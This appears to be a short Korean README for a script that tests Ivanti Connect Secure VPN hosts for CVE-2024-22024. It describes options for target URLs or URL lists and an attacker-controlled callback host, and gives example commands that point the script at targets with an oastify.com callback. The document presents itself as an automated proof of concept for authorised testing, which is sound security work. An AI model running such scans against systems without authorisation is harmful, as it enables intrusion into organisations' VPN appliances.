
Ivanti Connect Secure에서 CVE-2024-22024 취약점을 확인하세요
Ivanti Connect Secure에서 CVE-2024-22024 취약점 확인
[!WARNING] 교육 목적 및 승인된 테스트 전용입니다.
-u 또는 --target_url: 대상 Ivanti Connect Secure (ICS) URL 또는 URL 목록이 포함된 파일.
-c 또는 --attacker_url: 공격자 URL (Burp Collaborator, ngrok, 또는 Webhook.site의 고유 URL을 사용하여 생성)
-t 또는 --timeout: 요청에 대한 시간 제한(초), 기본값은 3초
단일 URL 테스트:
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
URL 목록 테스트:
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
다른 시간 제한(5초) 사용:
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
취약점을 발견한 사람.. 저는 PoC를 읽고 이를 자동화했습니다.